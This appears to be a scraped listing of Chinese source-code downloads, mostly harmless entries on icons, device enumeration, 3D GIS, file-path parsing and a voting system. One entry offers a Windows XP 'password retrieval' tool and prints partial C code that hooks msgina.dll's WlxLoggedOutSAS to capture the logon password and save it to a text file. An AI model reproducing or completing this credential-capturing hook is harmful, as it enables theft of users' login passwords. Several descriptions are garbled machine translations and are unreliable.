-
VC6.0源代码,可以设置系统图标,可以隐藏主窗口,更换图标
VC6.0源代码,可以设置系统图标,可以隐藏主窗口,更换图标-VC6.0 icon of the system source code
- 2022-05-29 22:12:13下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
2000/xp下消息发送器
2000/xp下消息发送器-2000/XP news transmitter
- 2022-01-25 22:08:17下载
- 积分:1
-
设备管理器的源代码
获取使用安装迪获得类开发人员功能的设备的设备信息。当首次调用该函数,第一个和第二个参数应设置为"0",和最后一个参数应设置为 DIGCF_ALLCLASSES 常数,以得到所有设备
- 2022-12-21 05:05:03下载
- 积分:1
-
文回顾与评述了三维GIS的相关发展情况,探讨了三维GIS的有关基本问题,如数据获取、大数据量存贮与处理、三维空间分析,同时指出科学计算可视化、数据库系统管理、数...
文回顾与评述了三维GIS的相关发展情况,探讨了三维GIS的有关基本问题,如数据获取、大数据量存贮与处理、三维空间分析,同时指出科学计算可视化、数据库系统管理、数字影象处理等技术的成熟和二维GIS长期发展提供的理论实践经验等为三维GIS的发展提供了良好的基础。最后为三维GIS实际系统的开发提出了几个值得注意的要点。-In this paper,the review and comment on the development of 3 dimension GIS are first made.Then the basic aspects about 3D GIS,such as data acquisition,storing and processing of mass data,analysis of 3D space,are discussed.Meanwhile, it points out that the techniques such as scientific computation visualization,database system management and digital image processing,and theories and experiences provided by development of 2D GIS offer a better platform form the development of 3D GIS.Finaally,some key points in developing practical system of 3D GIS is proposed.
- 2022-03-25 16:58:03下载
- 积分:1
-
C++.NET不错的教程
C++.NET不错的教程-C.NET good Guide
- 2022-02-11 18:55:38下载
- 积分:1
-
对全路径文件名进行分解,分解为驱动器、路径、文件名、扩展名...
对全路径文件名进行分解,分解为驱动器、路径、文件名、扩展名-Analyse the file name of absolute path, and parse it to driver,path,file name and extension name
- 2022-08-22 20:22:36下载
- 积分:1
-
很好的程序 很好的程序 很好的程序 很好的程序
很好的程序 很好的程序 很好的程序 很好的程序-henhaodechengxuhenhaodechengxuhenhaodechengxuhenhaodechengxuhenhaodechengxuhenhaodechengxuhenhaodechengxuhenhaodechengxu
- 2022-10-18 05:55:03下载
- 积分:1
-
一个基于windows ce 4.2系统的SH3处理器的UDP协议寨程序
一个基于windows ce 4.2系统的SH3处理器的UDP协议寨程序-windows ce based on a 4.2 system SH3 processor UDP Walled procedures
- 2023-02-21 13:45:04下载
- 积分:1
-
投票系统,主要提票数百分比,供票数统计等功能
投票系统,主要提票数百分比,供票数统计等功能-Voting system, mainly mentioning the percentage of votes for the votes statistics functions
- 2022-03-22 08:38:12下载
- 积分:1